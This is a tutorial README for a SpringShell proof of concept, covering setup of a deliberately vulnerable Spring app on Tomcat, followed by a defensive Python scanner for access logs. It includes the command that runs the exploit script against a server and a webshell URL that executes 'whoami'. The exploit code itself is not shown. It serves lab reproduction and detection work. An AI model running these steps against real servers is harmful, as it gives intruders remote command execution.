I present here a complete tutorial and PoC for the recent SpringShell vulnerability in the Spring Core module.
Runs on Ubuntu (tested on 20.04).
Github: https://github.com/agentzex/spring-shell-exploit-poc
Prerequisites:
- sudo apt install default-jre
- sudo apt install default-jdk
- sudo apt install maven
- Follow this guide to install Tomcat: https://www.vultr.com/docs/install-apache-tomcat-on-ubuntu-20-04-39123/ (it installs Tomcat 10, which works with the slight modification described below; you can also install Tomcat 9, which doesn't need this modification)
App Preparation:
- Download the Spring web app from the 'app' directory in this repo
- cd into it and run 'mvn package'
- After it's done, cd into the 'target' directory that was created and copy the 'zex-poc.war' file
Deployment (tomcat-root-dir should be '/opt/tomcat/' if you followed the above guide):
- If you're running Tomcat < 10: copy the war file to 'tomcat-root-dir/webapps/'
- If you're running Tomcat 10:
  - create a directory named 'webapps-javaee' in tomcat-root-dir
  - copy the war file to this directory
  - Tomcat will automatically migrate the legacy J2EE war file from that folder and deploy it in 'tomcat-root-dir/webapps/'
- Run Tomcat with 'tomcat-root-dir/bin/catalina.sh run' and check for errors.
- If everything worked, we can now run the poc.py file and use a browser to launch commands in the created webshell.
- Run: python (or python3) pwn.py --url http://server.ip:8080/zex-poc/greeting
- Access via browser or any other HTTP client with GET: http://server.ip:8080/zex-poc/tomcatwar.jsp?pwd=j&cmd=whoami
- PWND
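For the defensive side of the walkthrough above, here is an added example (not part of this repo) that scans Tomcat access-log lines for the two request shapes this PoC produces: a parameter name under the 'class.' prefix that Spring's mitigation advice tells applications to disallow, and a call to a .jsp with a 'cmd' parameter like the webshell request shown above. The log lines are constructed samples; the parameter value on the second line is a placeholder, not the PoC's payload.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Tomcat's default "common" access-log format (not real traffic).
# Line 2: a parameter name under the "class." prefix (value is a placeholder).
# Line 3: the webshell call shown in this README.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [31/Mar/2022:10:00:01 +0000] "GET /zex-poc/greeting?name=alice HTTP/1.1" 200 512
10.0.0.9 - - [31/Mar/2022:10:00:07 +0000] "POST /zex-poc/greeting?class.module.classLoader.PLACEHOLDER=x HTTP/1.1" 200 512
10.0.0.9 - - [31/Mar/2022:10:00:12 +0000] "GET /zex-poc/tomcatwar.jsp?pwd=j&cmd=whoami HTTP/1.1" 200 40
10.0.0.5 - - [31/Mar/2022:10:00:20 +0000] "GET /zex-poc/static/logo.png HTTP/1.1" 200 2048
"""

# Tomcat "common" log pattern: host ident user [time] "method target protocol" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_param(name: str) -> bool:
    """Spring's mitigation disallows binder fields matching class.*, Class.*, *.class.*, *.Class.*."""
    low = name.lower()
    return low.startswith("class.") or ".class." in low


def classify(line: str):
    """Return (ip, target, reasons) for a suspicious access-log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qsl(url.query, keep_blank_values=True)
    reasons = []
    if any(suspicious_param(k) for k, _ in params):
        reasons.append("class-loader property path in request parameters")
    # A .jsp taking a "cmd" parameter is the shape of the dropped webshell call.
    if url.path.lower().endswith(".jsp") and any(k == "cmd" for k, _ in params):
        reasons.append("jsp with cmd parameter (webshell-style call)")
    return (m.group("ip"), m.group("target"), reasons) if reasons else None


def scan(log_text: str):
    """Scan a whole access log and return the list of suspicious hits."""
    return [h for h in (classify(line) for line in log_text.splitlines()) if h]


if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_ACCESS_LOG):
        print(ip, target, "; ".join(reasons))
```

Parameters sent in a POST body do not appear in the access log, so pair this with request-body logging or a WAF rule; the .jsp check also only catches the file name pattern, so verify by listing unexpected .jsp files under the deployed webapp directory.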